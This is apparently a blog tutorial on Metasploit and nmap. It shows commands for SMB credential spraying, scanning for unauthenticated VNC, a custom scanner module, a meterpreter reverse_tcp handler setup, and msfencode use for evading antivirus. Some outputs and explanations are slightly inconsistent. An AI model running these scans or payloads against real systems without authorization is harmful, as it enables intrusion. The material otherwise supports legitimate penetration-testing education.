Vulnerability scanning : with Metasploit!

Scanning is one of the most important steps in the penetration testing
process; if done thoroughly, it will provide the best value to your
client.

A vulnerability scanner is an automated program designed to look for
weaknesses in computers, computer systems, networks, and applications.
A vulnerability scanner can also use a given set of user credentials to
log into the remote system and enumerate the software and services to
determine whether they are patched.

The Basic Vulnerability Scan :
we use netcat to grab a banner from the target 192.168.1.2. Banner
grabbing is the act of connecting to a remote network service and
reading the service identification (banner) that is returned.

root@kali:/opt/framework3/msf3# nc 192.168.1.2 80
GET HTTP 1/1
HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.1

As you can see, The information returned tells us that the system
running on port 80 is a Microsoft IIS 5.1–based web server. Armed with
this information, we could use a vulnerability scanner to determine
whether this version of IIS has any vulnerabilities associated with it
and whether this particular server has been patched.

SMB Login Check :
A common situation to find yourself in is being in possession of a
valid username and password combination, and wondering where else you
can use it. This is where the SMB Login Check Scanner can be very
useful, as it will connect to a range of hosts and determine if the
username/password combination can access the target.

-----------------------
msf > use auxiliary/scanner/smb/smb_login
msf auxiliary(smb_login) > show options
      ---show options------

msf auxiliary(smb_login) > set RHOSTS 192.168.1.2 /24
RHOSTS => 192.168.1.2/24
msf auxiliary(smb_login) > set SMBUser user
SMBUser => user
msf auxiliary(smb_login) > set SMBPass pasword
SMBPass => pasword
msf auxiliary(smb_login) > set THREADS 50
THREADS => 50
msf auxiliary(smb_login) > run
--------------------------------------------

VNC Authentication :

The VNC Authentication None Scanner will search a range of IP addresses
looking for targets that are running a VNC server without a password
configured.

To utilize the VNC scanner, we first select the auxiliary module,
define our options, then let it run.
----------------------------------
msf auxiliary(vnc_none_auth) > use auxiliary/scanner/vnc/vnc_none_auth
msf auxiliary(vnc_none_auth) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    5900             yes       The target port
   THREADS  1                yes       The number of concurrent threads

msf auxiliary(vnc_none_auth) > set RHOSTS 192.168.1.2 /24
RHOSTS => 192.168.1.2/24
msf auxiliary(vnc_none_auth) > set THREADS 50
THREADS => 50
msf auxiliary(vnc_none_auth) > run

Writing a Your Own Custom Scanner !

There are times where you may need a specific scanner, or having scan
activity conducted within Metasploit would be easier for scripting
purposes than using an external program. Metasploit has a lot of
features that can come in handy for this purpose, like access to all
of the exploit classes and methods, built in support for proxies, SSL,
reporting, and built in threading. Think of instances where you may
need to find every instance of a password on a system, or a scan for a
custom service.

Writing your own scanner module can also be extremely useful during
security audits by allowing you to locate every instance of a bad
password or you can scan in-house for a vulnerable service that needs
to be patched.

We will use this very simple TCP scanner that will connect to a host on
 a default port of 1337 which can be changed via the module options
at run time. Upon connecting to the server, it sends 'Hello world',
receives the response and prints it out along with the IP address of
the remote host.


Here is the Source code



----------------------------------------------------------------------
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
        include Msf::Exploit::Remote::Tcp
        include Msf::Auxiliary::Scanner
        def initialize
                super(
                        'Name'           => 'My custom TCP scan',
                        'Version'        => '$Revision: 1 $',
                        'Description'    => 'My quick scanner',
                        'Author'         => 'Your name here',
                        'License'        => MSF_LICENSE
                )
                register_options(
                        [
                                Opt::RPORT(1337)
                        ], self.class)
        end

        def run_host(ip)
                connect()
        greeting = "Hello world"
        sock.puts(greeting)
                data = sock.recv(1024)
                print_status("Received: #{data} from #{ip}")
                disconnect()
        end
end

--------------------------------------------------------------------------------------

We have saved this custom script under modules/auxiliary/scanner/ as
simple_tcp.rb. The saved location is important in Metasploit.


To test this rudimentary scanner, we set up a netcat listener on port
1337
and pipe in a text file to act as the server response.

root@bt:/# echo "Hello Metasploit" > banner.txt
root@bt:/# nc -lvnp 1337 < banner.txt
listening on [any] 1337...

Next, we load up msfconsole, select our scanner module, set its
parameters,
and run it to see if it works.

msf > use auxiliary/scanner/simple_tcp
msf auxiliary(simple_tcp) > show options
Module options:
Name   CurrentSetting    Required     Description
----   --------------- -------- -----------
RHOSTS                      yes    The target address range or CIDR identifier
RPORT        1337  yes      The target port
THREADS       1    yes       The number of concurrent threads
msf auxiliary(simple_tcp) > set RHOSTS 192.168.1.101
RHOSTS => 192.168.1.101
msf auxiliary(simple_tcp) > run

Targeted Scanning with metasploit !

A targeted scan looks for specific operating systems, services,
program versions, or configurations that are known to be exploitable
and that provide an easy door into a target network.

SMB Version Scanning :
Now that we have determined which hosts are available on the network,
we can attempt to determine which operating systems they are running.

we will use the 'scanner/smb/version' module to determine which
version of Windows is running on a target and which Samba version is
on a Linux host.

msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > set RHOSTS 192.168.1.155
RHOSTS => 192.168.1.155
msf auxiliary(smb_version) > set THREADS 11
THREADS => 11
msf auxiliary(smb_version) > run
if we issue the 'hosts' command now, the newly acquired information is
stored in Metasploit's database.

Hunting for Poorly Configured Microsoft SQL Servers :
When MS SQL is installed, it listens by default either on TCP port 1433
or on a random dynamic TCP port. If MS SQL is listening on a dynamic port,
simply query UDP port 1434 to discover on what dynamic TCP port MS SQL
is listening.


Let us search and load the MSSQL ping module inside the msfconsole.

msf > search mssql

Exploits
========

   Name                                       Description
   ----                                       -----------
   windows/mssql/lyris_listmanager_weak_pass  Lyris ListManager MSDE Weak sa Password
   windows/mssql/ms02_039_slammer             Microsoft SQL Server Resolution Overflow
   windows/mssql/ms02_056_hello               Microsoft SQL Server Hello Overflow
   windows/mssql/mssql_payload                Microsoft SQL Server Payload Execution


Auxiliary
=========

   Name                       Description
   ----                       -----------
   admin/mssql/mssql_enum     Microsoft SQL Server Configuration Enumerator
   admin/mssql/mssql_exec     Microsoft SQL Server xp_cmdshell Command Execution
   admin/mssql/mssql_sql      Microsoft SQL Server Generic Query
   scanner/mssql/mssql_login  MSSQL Login Utility
   scanner/mssql/mssql_ping   MSSQL Ping Utility

msf > use auxiliary/scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > show options

Module options (auxiliary/scanner/mssql/mssql_ping):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   PASSWORD                              no        The password for the specified username
   RHOSTS                                yes       The target address range or CIDR identifier
   THREADS              1                yes       The number of concurrent threads
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification

msf auxiliary(mssql_ping) > set RHOSTS 192.168.1.0
RHOSTS => 10.211.55.1/24
msf auxiliary(mssql_ping) > exploit

The first command we issued was to search for any 'mssql' plugins. The
second set of instructions was the 'use scanner/mssql/mssql_ping',
this will load the scanner module for us.

Next, 'show options' allows us to see what we need to specify. The
'set RHOSTS 192.168.1.0' sets the target IP we want to start looking
for SQL servers on.
After the 'run' command is issued, a scan is going to be performed and
pull back specific information about the MSSQL server.

Service Identification with metasploit !

Again, other than using Nmap to perform scanning for services on our
target network, Metasploit also includes a large variety of scanners
for various services, often helping you determine potentially
vulnerable running services on target machines.

SSH Server Scanning
If during your scanning you encounter machines running Secure Shell
(SSH), you should determine which version is running on the target. SSH is a
secure protocol, but vulnerabilities in various implementations have been
identified.

You can use the Framework’s ssh_version module to
determine the SSH version running on the target server.


msf > use scanner/ssh/ssh_version
msf  auxiliary(ssh_version) > set RHOST 127.0.0.1 
RHOST=> 127.0.0.1

msf auxiliary(ssh_version) > set THREADS 50
THREADS => 50

msf auxiliary(ssh_version) > run

FTP Scanning :
FTP is a complicated and insecure protocol. FTP servers are often the easiest
way into a target network, and you should always scan for, identify, and fingerprint
any FTP servers running on your target.

Scanning FTP services using the Framework’s
ftp_version module:



msf > use auxiliary/scanner/ftp/ftp_version

msf  auxiliary(ftp_version) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1

msf auxiliary(ftp_version) > set THREADS 255
THREADS => 255


msf auxiliary(ftp_version) > run

Information Gathering with Metasploit !

Your goals during intelligence gathering should be to gain

accurate information about your targets without revealing

your presence or your intentions, to learn how the

organization operates, and to determine the best route

of entry.

If you don’t do a thorough job of intelligence gathering, you may

miss vulnerable systems.

It takes time and patience to

sort through web pages, perform Google hacking, and map systems

thoroughly in an attempt to understand the infrastructure of a

particular target.

At this step, you will attempt to collect

as much information about the target environment as possible.

 Port Scanning :

we conduct port scans for open ports on

the target or conduct scans to determine what services are running.

Each system or running service that we discover gives us another

opportunity for exploitation. But beware: If you get careless while

active information gathering, you might be nabbed by an IDS or

intrusion prevention system (IPS)—not a good outcome for the covert

penetration tester.

Nmap is, by far, the most popular port scanning tool. It integrates

with Metasploit quite elegantly, storing scan output in a database.

Nmap lets you scan hosts to identify the services running on each,

any of which might offer a way in.

Nmap has a quite a few options, but we’ll use just a few of them for

the most part.

One of our preferred nmap options is -sS. This runs a stealth TCP scan

that determines whether a specific TCP-based port is open. Another

preferred option is -Pn, which tells nmap not to use ping to determine

whether a system is running; instead, it considers all hosts “alive.”

Now let’s run a quick nmap scan against a target using

both the -sS and -Pn flags:

root@kali:~# nmap -sS -Pn 127.0.0.1

When scan is completed, nmap reports a list of open ports, along with

a description of the associated service for each.

For more detail, try using the -A flag. This option will attempt

advanced service enumeration and banner grabbing, which may give you

even more details about the target system.

root@kali:~# nmap -Pn -sS -A 127.0.0.1

Working with Databases in Metasploit :

When you’re running a complex penetration test with a lot of targets,

keeping track of everything can be a challenge. Luckily, Metasploit

has you covered with expansive support for multiple database systems.

To ensure that database support is available for your system, you should

first decide which database system you want to run. Metasploit supports

MySQL and PostgreSQL; because PostgreSQL is the default, we’ll stick with

it in this discussion.

First, we start the database subsystem using the built-in kali-linux

init.d scripts.

root@kali~# /etc/init.d/postgresql-8.3 start

After PostgreSQL has started, we tell the Framework to connect to the

database instance. This connection requires a username, password, name of

the host on which the database is running, and the database name we want to

use.

Let’s make the connection.

msf > db_connect postgres:toor@127.0.0.1/msfbook

For now, we’ll use db_status to make sure that we’re connected

correctly.

Intelligence Gathering 21

msf > db_status
[*] postgresql connected to msfbook

Importing Nmap Results into Metasploit :

First, we scan the target machine using the -oX option to generate

a Subnet1.xml file:

nmap -Pn -sS -A -oX Subnet1 192.168.1.0

After generating the XML file, we use the db_import command to import

it into our database. We can then verify that the import worked by using the

db_hosts command, which lists the systems entries that have been created, as

shown here:

msf > db_connect postgres:toor@127.0.0.1/msf3
msf > db_import Subnet1.xml
msf > db_hosts -c address

How to use Metasploit !

Metasploit is the most advanced and popular Framework that can be used

for pen-testing.

Metasploit is a hacking framework written in ruby. It is designed to

help make writing and executing exploits as simple as possible.

Running Metasploit :

Metasploit should already be installed on the machine that you’re

( I am Using Kali-linux) using, so to start the console, simply run  msfconsole.

To run msfconsole, open terminal and give the command:

msfconsole

Before executing your exploit, it is useful to understand what some

Metasploit commands do.

Here are the lists of some of the command that you will use most :

use exploitname              

Tells Metasploit to use the exploit with   a specified name.

set RHOST hostname_or_ip     

Will instruct Metasploit to target the specified remote host.

set RPORT host_port          

Sets the port that Metasploit will connect to on the remote host.

set PAYLOAD generic/shell_bind_tcp   

Sets the payload that is used   to a generic payload that will give you a shell when a

service  is exploited.

set LPORT local_port        

 Sets the port number that the payload will open on the server when an exploit

 is exploited. It is important that this  port number be a port that can be opened

 on the server (i.e.it is not in use by another service and not reserved for

administrative use).

exploit                  

 Actually exploits the service. Another version of exploit, rexploit reloads your

 exploit code and then executes the exploit. This allows you to try minor changes to

 your exploit code without restarting the console.

show options             

 Will show you options that you have set and possibly ones that you might have forgotten

 to set. Each exploit and payload comes with  its own options that you can set. show

exploits and show payloads can also be used  to show all exploits and payloads that are

 built in to Metasploit.

Ohk now i will show you how to use that commands.

set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 1337
use exploit/multi/handler
set RHOST 198.168.2.3
set RPORT 1337
exploit

The commands use the exploit/multi/handler exploit to
attack 198.168.2.3 on port 1337 with the 
windows/meterpreter/reverse_tcp  payload. When it is successful it will
open port 1337 on the target machine and Metasploit will show you a 
shell.

Metasploit Fundamentals : Technology Overview !

Metasploit is the most advanced and popular Framework that can be used

for pen-testing.

Metasploit Framework :

                               

From the above pic,

You can see the main components of the framework architecture are:

Rex
Framework Core
Framework Base
Interfaces
Modules
Plugins

Interfaces : -

Metasploit offers more than one interface to its underlying

functionality, including console, command line, and graphical

interfaces.

MSFconsole :

Msfconsole is by far the most popular part of the Metasploit Framework

Starting MSFconsole

To launch msfconsole, enter msfconsole at the command line.

Tab Completion :

Tab completion depends on the ruby readline extension and nearly every

command in the console supports tab completion.

        use exploit/windows/dce
        use .*netapi.*
        set LHOST
        show
        set TARGET
        set PAYLOAD windows/shell/
        exp

MSFcli :

Msfcli and msfconsole take very different approaches to providing

access to the Framework.

msfcli runs directly from the command line, which allows you to

redirect output from other tools into msfcli and direct msfcli output

to other command-line tools.

Benefits of mscli :

 Supports the launching of exploits and auxiliary modules 
 Convenient to use when testing or developing a new exploit
 Good tool for one-off exploitation
 Excellent if you know exactly which exploit and options you need
 Wonderful for use in scripts and basic automation

Armitage :

The armitage component of Metasploit is a fully interactive graphical

user interface.

Running Armitage

To launch armitage, run the command armitage.

After armitage is running, simply click a menu to perform a particular

attack or access other Metasploit functionality

Metasploit Utilities:

MSFpayload:

The msfpayload component of Metasploit allows you to generate shellcode,

executables, and much more for use in exploits outside of the Framework.

Shellcode can be generated in many formats including C, Ruby,

JavaScript, and even Visual Basic for Applications.

MSFencode:

The shellcode generated by msfpayload is fully functional, but it

contains several null characters that, when interpreted by many

programs, signify the end of a string, and this will cause the code to

terminate before completion.

In other words, those x00s and xffs can break your payload!

To avoid detection ,Metasploit’s developers offer msfencode, which

helps you to avoid bad characters and evade antivirus and IDSs by

encoding the original payload in a way that does not include “bad”

characters. Enter msfencode -h to see a list of msfencode options.

Exploits:

An exploit is the means by which an attacker, or pen tester for that

matter, takes advantage of a flaw within a system, an application, or a

service. An attacker uses an exploit to attack a system in a way that

results in a particular desired outcome that the developer never

intended.

All exploits in the Metasploit Framework will fall into two categories:

active and passive.

Active Exploits

Active exploits will exploit a specific host, run until completion, and

then exit.

   Brute-force modules will exit when a shell opens from the victim.

   Module execution stops if an error is encountered.

   You can force an active module to the background by passing '-j' to

   the exploit command.

 Passive Exploits

Passive exploits wait for incoming hosts and exploit them as they

connect.

  Passive exploits almost always focus on clients such as web browsers,

  FTP clients, etc.

  They can also be used in conjunction with email exploits, waiting for

  connections.

  Passive exploits report shells as they happen can be enumerated by

  passing '-l' to the sessions command. Passing '-i' will interact with a shell.

Payloads :

A payload is code that we want the system to execute and that is to be

selected and delivered by the Framework

There are three different types of payload module types in Metasploit:

Singles, Stagers, and Stages.

Databases :

When conducting a penetration test, it is frequently a challenge to

keep track of everything you have done to the target network. This is

where having a database configured can be a great time saver. Metasploit

has built-in support for the PostgreSQL database system.